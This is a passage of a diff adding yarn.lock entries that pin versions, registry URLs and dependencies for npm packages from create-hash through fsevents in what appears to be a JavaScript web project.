"https://registry.yarnpkg.com/create-hash/-/create-hash-1.2.0.tgz#889078af11a63756bcfb59bd221996be3a9ef196" + dependencies: + cipher-base "^1.0.1" + inherits "^2.0.1" + md5.js "^1.3.4" + ripemd160 "^2.0.1" + sha.js "^2.4.0" + +create-hmac@^1.1.0, create-hmac@^1.1.2, create-hmac@^1.1.4: + version "1.1.7" + resolved "https://registry.yarnpkg.com/create-hmac/-/create-hmac-1.1.7.tgz#69170c78b3ab957147b2b8b04572e47ead2243ff" + dependencies: + cipher-base "^1.0.3" + create-hash "^1.1.0" + inherits "^2.0.1" + ripemd160 "^2.0.0" + safe-buffer "^5.0.1" + sha.js "^2.4.8" + +cross-spawn@^5.0.1: + version "5.1.0" + resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-5.1.0.tgz#e8bd0efee58fcff6f8f94510a0a554bbfa235449" + dependencies: + lru-cache "^4.0.1" + shebang-command "^1.2.0" + which "^1.2.9" + +cross-spawn@^6.0.5: + version "6.0.5" + resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-6.0.5.tgz#4a5ec7c64dfae22c3a14124dbacdee846d80cbc4" + dependencies: + nice-try "^1.0.4" + path-key "^2.0.1" + semver "^5.5.0" + shebang-command "^1.2.0" + which "^1.2.9" + +crypto-browserify@^3.11.0: + version "3.12.0" + resolved "https://registry.yarnpkg.com/crypto-browserify/-/crypto-browserify-3.12.0.tgz#396cf9f3137f03e4b8e532c58f698254e00f80ec" + dependencies: + browserify-cipher "^1.0.0" + browserify-sign "^4.0.0" + create-ecdh "^4.0.0" + create-hash "^1.1.0" + create-hmac "^1.1.0" + diffie-hellman "^5.0.0" + inherits "^2.0.1" + pbkdf2 "^3.0.3" + public-encrypt "^4.0.0" + randombytes "^2.0.0" + randomfill "^1.0.3" + +crypto-random-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/crypto-random-string/-/crypto-random-string-1.0.0.tgz#a230f64f568310e1498009940790ec99545bca7e" + +css-color-names@0.0.4: + version "0.0.4" + resolved "https://registry.yarnpkg.com/css-color-names/-/css-color-names-0.0.4.tgz#808adc2e79cf84738069b646cb20ec27beb629e0" + +css-loader@^0.28.11: + version "0.28.11" + resolved 
"https://registry.yarnpkg.com/css-loader/-/css-loader-0.28.11.tgz#c3f9864a700be2711bb5a2462b2389b1a392dab7" + dependencies: + babel-code-frame "^6.26.0" + css-selector-tokenizer "^0.7.0" + cssnano "^3.10.0" + icss-utils "^2.1.0" + loader-utils "^1.0.2" + lodash.camelcase "^4.3.0" + object-assign "^4.1.1" + postcss "^5.0.6" + postcss-modules-extract-imports "^1.2.0" + postcss-modules-local-by-default "^1.2.0" + postcss-modules-scope "^1.1.0" + postcss-modules-values "^1.3.0" + postcss-value-parser "^3.3.0" + source-list-map "^2.0.0" + +css-parse@1.7.x: + version "1.7.0" + resolved "https://registry.yarnpkg.com/css-parse/-/css-parse-1.7.0.tgz#321f6cf73782a6ff751111390fc05e2c657d8c9b" + +css-select@^1.1.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/css-select/-/css-select-1.2.0.tgz#2b3a110539c5355f1cd8d314623e870b121ec858" + dependencies: + boolbase "~1.0.0" + css-what "2.1" + domutils "1.5.1" + nth-check "~1.0.1" + +css-selector-tokenizer@^0.7.0: + version "0.7.0" + resolved "https://registry.yarnpkg.com/css-selector-tokenizer/-/css-selector-tokenizer-0.7.0.tgz#e6988474ae8c953477bf5e7efecfceccd9cf4c86" + dependencies: + cssesc "^0.1.0" + fastparse "^1.1.1" + regexpu-core "^1.0.0" + +css-what@2.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/css-what/-/css-what-2.1.0.tgz#9467d032c38cfaefb9f2d79501253062f87fa1bd" + +cssesc@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/cssesc/-/cssesc-0.1.0.tgz#c814903e45623371a0477b40109aaafbeeaddbb4" + +cssnano@^3.10.0: + version "3.10.0" + resolved "https://registry.yarnpkg.com/cssnano/-/cssnano-3.10.0.tgz#4f38f6cea2b9b17fa01490f23f1dc68ea65c1c38" + dependencies: + autoprefixer "^6.3.1" + decamelize "^1.1.2" + defined "^1.0.0" + has "^1.0.1" + object-assign "^4.0.1" + postcss "^5.0.14" + postcss-calc "^5.2.0" + postcss-colormin "^2.1.8" + postcss-convert-values "^2.3.4" + postcss-discard-comments "^2.0.4" + postcss-discard-duplicates "^2.0.1" + postcss-discard-empty "^2.0.1" + 
postcss-discard-overridden "^0.1.1" + postcss-discard-unused "^2.2.1" + postcss-filter-plugins "^2.0.0" + postcss-merge-idents "^2.1.5" + postcss-merge-longhand "^2.0.1" + postcss-merge-rules "^2.0.3" + postcss-minify-font-values "^1.0.2" + postcss-minify-gradients "^1.0.1" + postcss-minify-params "^1.0.4" + postcss-minify-selectors "^2.0.4" + postcss-normalize-charset "^1.1.0" + postcss-normalize-url "^3.0.7" + postcss-ordered-values "^2.1.0" + postcss-reduce-idents "^2.2.2" + postcss-reduce-initial "^1.0.0" + postcss-reduce-transforms "^1.0.3" + postcss-svgo "^2.1.1" + postcss-unique-selectors "^2.0.2" + postcss-value-parser "^3.2.3" + postcss-zindex "^2.0.1" + +csso@~2.3.1: + version "2.3.2" + resolved "https://registry.yarnpkg.com/csso/-/csso-2.3.2.tgz#ddd52c587033f49e94b71fc55569f252e8ff5f85" + dependencies: + clap "^1.0.9" + source-map "^0.5.3" + +currently-unhandled@^0.4.1: + version "0.4.1" + resolved "https://registry.yarnpkg.com/currently-unhandled/-/currently-unhandled-0.4.1.tgz#988df33feab191ef799a61369dd76c17adf957ea" + dependencies: + array-find-index "^1.0.1" + +cyclist@~0.2.2: + version "0.2.2" + resolved "https://registry.yarnpkg.com/cyclist/-/cyclist-0.2.2.tgz#1b33792e11e914a2fd6d6ed6447464444e5fa640" + +d@1: + version "1.0.0" + resolved "https://registry.yarnpkg.com/d/-/d-1.0.0.tgz#754bb5bfe55451da69a58b94d45f4c5b0462d58f" + dependencies: + es5-ext "^0.10.9" + +date-now@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/date-now/-/date-now-0.1.4.tgz#eaf439fd4d4848ad74e5cc7dbef200672b9e345b" + +de-indent@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/de-indent/-/de-indent-1.0.2.tgz#b2038e846dc33baa5796128d0804b455b8c1e21d" + +debug@*, debug@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/debug/-/debug-3.1.0.tgz#5bb5a0672628b64149566ba16819e61518c67261" + dependencies: + ms "2.0.0" + +debug@^2.1.2, debug@^2.2.0, debug@^2.3.3, debug@^2.6.1, debug@^2.6.3, debug@^2.6.8: + version "2.6.9" + 
resolved "https://registry.yarnpkg.com/debug/-/debug-2.6.9.tgz#5d128515df134ff327e90a4c93f4e077a536341f" + dependencies: + ms "2.0.0" + +decamelize-keys@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/decamelize-keys/-/decamelize-keys-1.1.0.tgz#d171a87933252807eb3cb61dc1c1445d078df2d9" + dependencies: + decamelize "^1.1.0" + map-obj "^1.0.0" + +decamelize@^1.1.0, decamelize@^1.1.2: + version "1.2.0" + resolved "https://registry.yarnpkg.com/decamelize/-/decamelize-1.2.0.tgz#f6534d15148269b20352e7bee26f501f9a191290" + +decode-uri-component@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/decode-uri-component/-/decode-uri-component-0.2.0.tgz#eb3913333458775cb84cd1a1fae062106bb87545" + +deep-equal@~1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/deep-equal/-/deep-equal-1.0.1.tgz#f5d260292b660e084eff4cdbc9f08ad3247448b5" + +deep-extend@^0.6.0: + version "0.6.0" + resolved "https://registry.yarnpkg.com/deep-extend/-/deep-extend-0.6.0.tgz#c4fa7c95404a17a9c3e8ca7e1537312b736330ac" + +deepmerge@^1.5.2: + version "1.5.2" + resolved "https://registry.yarnpkg.com/deepmerge/-/deepmerge-1.5.2.tgz#10499d868844cdad4fee0842df8c7f6f0c95a753" + +define-properties@^1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/define-properties/-/define-properties-1.1.2.tgz#83a73f2fea569898fb737193c8f873caf6d45c94" + dependencies: + foreach "^2.0.5" + object-keys "^1.0.8" + +define-property@^0.2.5: + version "0.2.5" + resolved "https://registry.yarnpkg.com/define-property/-/define-property-0.2.5.tgz#c35b1ef918ec3c990f9a5bc57be04aacec5c8116" + dependencies: + is-descriptor "^0.1.0" + +define-property@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/define-property/-/define-property-1.0.0.tgz#769ebaaf3f4a63aad3af9e8d304c9bbe79bfb0e6" + dependencies: + is-descriptor "^1.0.0" + +define-property@^2.0.2: + version "2.0.2" + resolved 
"https://registry.yarnpkg.com/define-property/-/define-property-2.0.2.tgz#d459689e8d654ba77e02a817f8710d702cb16e9d" + dependencies: + is-descriptor "^1.0.2" + isobject "^3.0.1" + +defined@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/defined/-/defined-1.0.0.tgz#c98d9bcef75674188e110969151199e39b1fa693" + +delegate@^3.1.2: + version "3.2.0" + resolved "https://registry.yarnpkg.com/delegate/-/delegate-3.2.0.tgz#b66b71c3158522e8ab5744f720d8ca0c2af59166" + +delegates@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/delegates/-/delegates-1.0.0.tgz#84c6e159b81904fdca59a0ef44cd870d31250f9a" + +depd@^1.1.0, depd@~1.1.1, depd@~1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/depd/-/depd-1.1.2.tgz#9bcd52e14c097763e749b274c4346ed2e560b5a9" + +des.js@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/des.js/-/des.js-1.0.0.tgz#c074d2e2aa6a8a9a07dbd61f9a15c2cd83ec8ecc" + dependencies: + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + +destroy@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/destroy/-/destroy-1.0.4.tgz#978857442c44749e4206613e37946205826abd80" + +detect-libc@^1.0.2: + version "1.0.3" + resolved "https://registry.yarnpkg.com/detect-libc/-/detect-libc-1.0.3.tgz#fa137c4bd698edf55cd5cd02ac559f91a4c4ba9b" + +diacritics@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/diacritics/-/diacritics-1.3.0.tgz#3efa87323ebb863e6696cebb0082d48ff3d6f7a1" + +diffie-hellman@^5.0.0: + version "5.0.3" + resolved "https://registry.yarnpkg.com/diffie-hellman/-/diffie-hellman-5.0.3.tgz#40e8ee98f55a2149607146921c63e1ae5f3d2875" + dependencies: + bn.js "^4.1.0" + miller-rabin "^4.0.0" + randombytes "^2.0.0" + +dir-glob@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/dir-glob/-/dir-glob-2.0.0.tgz#0b205d2b6aef98238ca286598a8204d29d0a0034" + dependencies: + arrify "^1.0.1" + path-type "^3.0.0" + +docsearch.js@^2.5.2: + version "2.5.2" + resolved 
"https://registry.yarnpkg.com/docsearch.js/-/docsearch.js-2.5.2.tgz#1a3521c92e5f252cc522c57357ef1c47b945b381" + dependencies: + algoliasearch "^3.24.5" + autocomplete.js "^0.29.0" + hogan.js "^3.0.2" + to-factory "^1.0.0" + +dom-converter@~0.1: + version "0.1.4" + resolved "https://registry.yarnpkg.com/dom-converter/-/dom-converter-0.1.4.tgz#a45ef5727b890c9bffe6d7c876e7b19cb0e17f3b" + dependencies: + utila "~0.3" + +dom-serializer@0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/dom-serializer/-/dom-serializer-0.1.0.tgz#073c697546ce0780ce23be4a28e293e40bc30c82" + dependencies: + domelementtype "~1.1.1" + entities "~1.1.1" + +dom-walk@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/dom-walk/-/dom-walk-0.1.1.tgz#672226dc74c8f799ad35307df936aba11acd6018" + +domain-browser@^1.1.1: + version "1.2.0" + resolved "https://registry.yarnpkg.com/domain-browser/-/domain-browser-1.2.0.tgz#3d31f50191a6749dd1375a7f522e823d42e54eda" + +domelementtype@1: + version "1.3.0" + resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.3.0.tgz#b17aed82e8ab59e52dd9c19b1756e0fc187204c2" + +domelementtype@~1.1.1: + version "1.1.3" + resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.1.3.tgz#bd28773e2642881aec51544924299c5cd822185b" + +domhandler@2.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/domhandler/-/domhandler-2.1.0.tgz#d2646f5e57f6c3bab11cf6cb05d3c0acf7412594" + dependencies: + domelementtype "1" + +domutils@1.1: + version "1.1.6" + resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.1.6.tgz#bddc3de099b9a2efacc51c623f28f416ecc57485" + dependencies: + domelementtype "1" + +domutils@1.5.1: + version "1.5.1" + resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.5.1.tgz#dcd8488a26f563d61079e48c9f7b7e32373682cf" + dependencies: + dom-serializer "0" + domelementtype "1" + +dot-prop@^4.1.0, dot-prop@^4.1.1: + version "4.2.0" + resolved 
"https://registry.yarnpkg.com/dot-prop/-/dot-prop-4.2.0.tgz#1f19e0c2e1aa0e32797c49799f2837ac6af69c57" + dependencies: + is-obj "^1.0.0" + +duplexer3@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/duplexer3/-/duplexer3-0.1.4.tgz#ee01dd1cac0ed3cbc7fdbea37dc0a8f1ce002ce2" + +duplexify@^3.4.2, duplexify@^3.6.0: + version "3.6.0" + resolved "https://registry.yarnpkg.com/duplexify/-/duplexify-3.6.0.tgz#592903f5d80b38d037220541264d69a198fb3410" + dependencies: + end-of-stream "^1.0.0" + inherits "^2.0.1" + readable-stream "^2.0.0" + stream-shift "^1.0.0" + +ee-first@1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/ee-first/-/ee-first-1.1.1.tgz#590c61156b0ae2f4f0255732a158b266bc56b21d" + +electron-to-chromium@^1.2.7, electron-to-chromium@^1.3.47: + version "1.3.50" + resolved "https://registry.yarnpkg.com/electron-to-chromium/-/electron-to-chromium-1.3.50.tgz#7438b76f92b41b919f3fbdd350fbd0757dacddf7" + +elliptic@^6.0.0: + version "6.4.0" + resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.4.0.tgz#cac9af8762c85836187003c8dfe193e5e2eae5df" + dependencies: + bn.js "^4.4.0" + brorand "^1.0.1" + hash.js "^1.0.0" + hmac-drbg "^1.0.0" + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + minimalistic-crypto-utils "^1.0.0" + +emojis-list@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/emojis-list/-/emojis-list-2.1.0.tgz#4daa4d9db00f9819880c79fa457ae5b09a1fd389" + +end-of-stream@^1.0.0, end-of-stream@^1.1.0: + version "1.4.1" + resolved "https://registry.yarnpkg.com/end-of-stream/-/end-of-stream-1.4.1.tgz#ed29634d19baba463b6ce6b80a37213eab71ec43" + dependencies: + once "^1.4.0" + +enhanced-resolve@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/enhanced-resolve/-/enhanced-resolve-4.0.0.tgz#e34a6eaa790f62fccd71d93959f56b2b432db10a" + dependencies: + graceful-fs "^4.1.2" + memory-fs "^0.4.0" + tapable "^1.0.0" + +entities@~1.1.1: + version "1.1.1" + resolved 
"https://registry.yarnpkg.com/entities/-/entities-1.1.1.tgz#6e5c2d0a5621b5dadaecef80b90edfb5cd7772f0" + +envify@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/envify/-/envify-4.1.0.tgz#f39ad3db9d6801b4e6b478b61028d3f0b6819f7e" + dependencies: + esprima "^4.0.0" + through "~2.3.4" + +errno@^0.1.3, errno@~0.1.7: + version "0.1.7" + resolved "https://registry.yarnpkg.com/errno/-/errno-0.1.7.tgz#4684d71779ad39af177e3f007996f7c67c852618" + dependencies: + prr "~1.0.1" + +error-ex@^1.2.0, error-ex@^1.3.1: + version "1.3.2" + resolved "https://registry.yarnpkg.com/error-ex/-/error-ex-1.3.2.tgz#b4ac40648107fdcdcfae242f428bea8a14d4f1bf" + dependencies: + is-arrayish "^0.2.1" + +error-inject@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/error-inject/-/error-inject-1.0.0.tgz#e2b3d91b54aed672f309d950d154850fa11d4f37" + +es-abstract@^1.5.1: + version "1.12.0" + resolved "https://registry.yarnpkg.com/es-abstract/-/es-abstract-1.12.0.tgz#9dbbdd27c6856f0001421ca18782d786bf8a6165" + dependencies: + es-to-primitive "^1.1.1" + function-bind "^1.1.1" + has "^1.0.1" + is-callable "^1.1.3" + is-regex "^1.0.4" + +es-to-primitive@^1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/es-to-primitive/-/es-to-primitive-1.1.1.tgz#45355248a88979034b6792e19bb81f2b7975dd0d" + dependencies: + is-callable "^1.1.1" + is-date-object "^1.0.1" + is-symbol "^1.0.1" + +es5-ext@^0.10.35, es5-ext@^0.10.9, es5-ext@~0.10.14: + version "0.10.45" + resolved "https://registry.yarnpkg.com/es5-ext/-/es5-ext-0.10.45.tgz#0bfdf7b473da5919d5adf3bd25ceb754fccc3653" + dependencies: + es6-iterator "~2.0.3" + es6-symbol "~3.1.1" + next-tick "1" + +es6-iterator@~2.0.3: + version "2.0.3" + resolved "https://registry.yarnpkg.com/es6-iterator/-/es6-iterator-2.0.3.tgz#a7de889141a05a94b0854403b2d0a0fbfa98f3b7" + dependencies: + d "1" + es5-ext "^0.10.35" + es6-symbol "^3.1.1" + +es6-promise@^4.1.0: + version "4.2.4" + resolved 
"https://registry.yarnpkg.com/es6-promise/-/es6-promise-4.2.4.tgz#dc4221c2b16518760bd8c39a52d8f356fc00ed29" + +es6-symbol@^3.1.1, es6-symbol@~3.1.1: + version "3.1.1" + resolved "https://registry.yarnpkg.com/es6-symbol/-/es6-symbol-3.1.1.tgz#bf00ef4fdab6ba1b46ecb7b629b4c7ed5715cc77" + dependencies: + d "1" + es5-ext "~0.10.14" + +escape-html@^1.0.3, escape-html@~1.0.1: + version "1.0.3" + resolved "https://registry.yarnpkg.com/escape-html/-/escape-html-1.0.3.tgz#0258eae4d3d0c0974de1c169188ef0051d1d1988" + +escape-string-regexp@^1.0.2, escape-string-regexp@^1.0.5: + version "1.0.5" + resolved "https://registry.yarnpkg.com/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz#1b61c0562190a8dff6ae3bb2cf0200ca130b86d4" + +eslint-scope@^3.7.1: + version "3.7.1" + resolved "https://registry.yarnpkg.com/eslint-scope/-/eslint-scope-3.7.1.tgz#3d63c3edfda02e06e01a452ad88caacc7cdcb6e8" + dependencies: + esrecurse "^4.1.0" + estraverse "^4.1.1" + +esprima@^2.6.0: + version "2.7.3" + resolved "https://registry.yarnpkg.com/esprima/-/esprima-2.7.3.tgz#96e3b70d5779f6ad49cd032673d1c312767ba581" + +esprima@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/esprima/-/esprima-4.0.0.tgz#4499eddcd1110e0b218bacf2fa7f7f59f55ca804" + +esrecurse@^4.1.0: + version "4.2.1" + resolved "https://registry.yarnpkg.com/esrecurse/-/esrecurse-4.2.1.tgz#007a3b9fdbc2b3bb87e4879ea19c92fdbd3942cf" + dependencies: + estraverse "^4.1.0" + +estraverse@^4.1.0, estraverse@^4.1.1: + version "4.2.0" + resolved "https://registry.yarnpkg.com/estraverse/-/estraverse-4.2.0.tgz#0dee3fed31fcd469618ce7342099fc1afa0bdb13" + +esutils@^2.0.2: + version "2.0.2" + resolved "https://registry.yarnpkg.com/esutils/-/esutils-2.0.2.tgz#0abf4f1caa5bcb1f7a9d8acc6dea4faaa04bac9b" + +events@^1.0.0, events@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/events/-/events-1.1.1.tgz#9ebdb7635ad099c70dcc4c2a1f5004288e8bd924" + +evp_bytestokey@^1.0.0, evp_bytestokey@^1.0.3: + version "1.0.3" + resolved 
"https://registry.yarnpkg.com/evp_bytestokey/-/evp_bytestokey-1.0.3.tgz#7fcbdb198dc71959432efe13842684e0525acb02" + dependencies: + md5.js "^1.3.4" + safe-buffer "^5.1.1" + +execa@^0.7.0: + version "0.7.0" + resolved "https://registry.yarnpkg.com/execa/-/execa-0.7.0.tgz#944becd34cc41ee32a63a9faf27ad5a65fc59777" + dependencies: + cross-spawn "^5.0.1" + get-stream "^3.0.0" + is-stream "^1.1.0" + npm-run-path "^2.0.0" + p-finally "^1.0.0" + signal-exit "^3.0.0" + strip-eof "^1.0.0" + +execa@^0.8.0: + version "0.8.0" + resolved "https://registry.yarnpkg.com/execa/-/execa-0.8.0.tgz#d8d76bbc1b55217ed190fd6dd49d3c774ecfc8da" + dependencies: + cross-spawn "^5.0.1" + get-stream "^3.0.0" + is-stream "^1.1.0" + npm-run-path "^2.0.0" + p-finally "^1.0.0" + signal-exit "^3.0.0" + strip-eof "^1.0.0" + +expand-brackets@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-0.1.5.tgz#df07284e342a807cd733ac5af72411e581d1177b" + dependencies: + is-posix-bracket "^0.1.0" + +expand-brackets@^2.1.4: + version "2.1.4" + resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-2.1.4.tgz#b77735e315ce30f6b6eff0f83b04151a22449622" + dependencies: + debug "^2.3.3" + define-property "^0.2.5" + extend-shallow "^2.0.1" + posix-character-classes "^0.1.0" + regex-not "^1.0.0" + snapdragon "^0.8.1" + to-regex "^3.0.1" + +expand-range@^1.8.1: + version "1.8.2" + resolved "https://registry.yarnpkg.com/expand-range/-/expand-range-1.8.2.tgz#a299effd335fe2721ebae8e257ec79644fc85337" + dependencies: + fill-range "^2.1.0" + +extend-shallow@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-2.0.1.tgz#51af7d614ad9a9f610ea1bafbb989d6b1c56890f" + dependencies: + is-extendable "^0.1.0" + +extend-shallow@^3.0.0, extend-shallow@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-3.0.2.tgz#26a71aaf073b39fb2127172746131c2704028db8" + dependencies: + 
assign-symbols "^1.0.0" + is-extendable "^1.0.1" + +extglob@^0.3.1: + version "0.3.2" + resolved "https://registry.yarnpkg.com/extglob/-/extglob-0.3.2.tgz#2e18ff3d2f49ab2765cec9023f011daa8d8349a1" + dependencies: + is-extglob "^1.0.0" + +extglob@^2.0.4: + version "2.0.4" + resolved "https://registry.yarnpkg.com/extglob/-/extglob-2.0.4.tgz#ad00fe4dc612a9232e8718711dc5cb5ab0285543" + dependencies: + array-unique "^0.3.2" + define-property "^1.0.0" + expand-brackets "^2.1.4" + extend-shallow "^2.0.1" + fragment-cache "^0.2.1" + regex-not "^1.0.0" + snapdragon "^0.8.1" + to-regex "^3.0.1" + +fast-deep-equal@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz#7b05218ddf9667bf7f370bf7fdb2cb15fdd0aa49" + +fast-glob@^2.0.2: + version "2.2.2" + resolved "https://registry.yarnpkg.com/fast-glob/-/fast-glob-2.2.2.tgz#71723338ac9b4e0e2fff1d6748a2a13d5ed352bf" + dependencies: + "@mrmlnc/readdir-enhanced" "^2.2.1" + "@nodelib/fs.stat" "^1.0.1" + glob-parent "^3.1.0" + is-glob "^4.0.0" + merge2 "^1.2.1" + micromatch "^3.1.10" + +fast-json-stable-stringify@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/fast-json-stable-stringify/-/fast-json-stable-stringify-2.0.0.tgz#d5142c0caee6b1189f87d3a76111064f86c8bbf2" + +fastparse@^1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/fastparse/-/fastparse-1.1.1.tgz#d1e2643b38a94d7583b479060e6c4affc94071f8" + +figures@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/figures/-/figures-2.0.0.tgz#3ab1a2d2a62c8bfb431a0c94cb797a2fce27c962" + dependencies: + escape-string-regexp "^1.0.5" + +file-loader@^1.1.11: + version "1.1.11" + resolved "https://registry.yarnpkg.com/file-loader/-/file-loader-1.1.11.tgz#6fe886449b0f2a936e43cabaac0cdbfb369506f8" + dependencies: + loader-utils "^1.0.2" + schema-utils "^0.4.5" + +filename-regex@^2.0.0: + version "2.0.1" + resolved 
"https://registry.yarnpkg.com/filename-regex/-/filename-regex-2.0.1.tgz#c1c4b9bee3e09725ddb106b75c1e301fe2f18b26" + +fill-range@^2.1.0: + version "2.2.4" + resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-2.2.4.tgz#eb1e773abb056dcd8df2bfdf6af59b8b3a936565" + dependencies: + is-number "^2.1.0" + isobject "^2.0.0" + randomatic "^3.0.0" + repeat-element "^1.1.2" + repeat-string "^1.5.2" + +fill-range@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-4.0.0.tgz#d544811d428f98eb06a63dc402d2403c328c38f7" + dependencies: + extend-shallow "^2.0.1" + is-number "^3.0.0" + repeat-string "^1.6.1" + to-regex-range "^2.1.0" + +find-cache-dir@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/find-cache-dir/-/find-cache-dir-1.0.0.tgz#9288e3e9e3cc3748717d39eade17cf71fc30ee6f" + dependencies: + commondir "^1.0.1" + make-dir "^1.0.0" + pkg-dir "^2.0.0" + +find-up@^2.0.0, find-up@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/find-up/-/find-up-2.1.0.tgz#45d1b7e506c717ddd482775a2b77920a3c0c57a7" + dependencies: + locate-path "^2.0.0" + +flatten@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/flatten/-/flatten-1.0.2.tgz#dae46a9d78fbe25292258cc1e780a41d95c03782" + +flush-write-stream@^1.0.0: + version "1.0.3" + resolved "https://registry.yarnpkg.com/flush-write-stream/-/flush-write-stream-1.0.3.tgz#c5d586ef38af6097650b49bc41b55fabb19f35bd" + dependencies: + inherits "^2.0.1" + readable-stream "^2.0.4" + +for-in@^1.0.1, for-in@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/for-in/-/for-in-1.0.2.tgz#81068d295a8142ec0ac726c6e2200c30fb6d5e80" + +for-own@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/for-own/-/for-own-0.1.5.tgz#5265c681a4f294dabbf17c9509b6763aa84510ce" + dependencies: + for-in "^1.0.1" + +foreach@^2.0.5: + version "2.0.5" + resolved 
"https://registry.yarnpkg.com/foreach/-/foreach-2.0.5.tgz#0bee005018aeb260d0a3af3ae658dd0136ec1b99" + +fragment-cache@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/fragment-cache/-/fragment-cache-0.2.1.tgz#4290fad27f13e89be7f33799c6bc5a0abfff0d19" + dependencies: + map-cache "^0.2.2" + +fresh@^0.5.2: + version "0.5.2" + resolved "https://registry.yarnpkg.com/fresh/-/fresh-0.5.2.tgz#3d8cadd90d976569fa835ab1f8e4b23a105605a7" + +from2@^2.1.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/from2/-/from2-2.3.0.tgz#8bfb5502bde4a4d36cfdeea007fcca21d7e382af" + dependencies: + inherits "^2.0.1" + readable-stream "^2.0.0" + +fs-extra@^4.0.2: + version "4.0.3" + resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-4.0.3.tgz#0d852122e5bc5beb453fb028e9c0c9bf36340c94" + dependencies: + graceful-fs "^4.1.2" + jsonfile "^4.0.0" + universalify "^0.1.0" + +fs-extra@^5.0.0: + version "5.0.0" + resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-5.0.0.tgz#414d0110cdd06705734d055652c5411260c31abd" + dependencies: + graceful-fs "^4.1.2" + jsonfile "^4.0.0" + universalify "^0.1.0" + +fs-minipass@^1.2.5: + version "1.2.5" + resolved "https://registry.yarnpkg.com/fs-minipass/-/fs-minipass-1.2.5.tgz#06c277218454ec288df77ada54a03b8702aacb9d" + dependencies: + minipass "^2.2.1" + +fs-write-stream-atomic@^1.0.8: + version "1.0.10" + resolved "https://registry.yarnpkg.com/fs-write-stream-atomic/-/fs-write-stream-atomic-1.0.10.tgz#b47df53493ef911df75731e70a9ded0189db40c9" + dependencies: + graceful-fs "^4.1.2" + iferr "^0.1.5" + imurmurhash "^0.1.4" + readable-stream "1 || 2" + +fs.realpath@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/fs.realpath/-/fs.realpath-1.0.0.tgz#1504ad2523158caa40db4a2787cb01411994ea4f" + +fsevents@^1.2.2: + version "1.2.4" + resolved "https://registry.yarnpkg.com/fsevents/-/fsevents-1.2.4.tgz#f41dcb1af2582af3692da36fc55cbd8e1041c426" + dependencies: + nan "^2.9.2" + node-pre-gyp "^0.10.0" + 
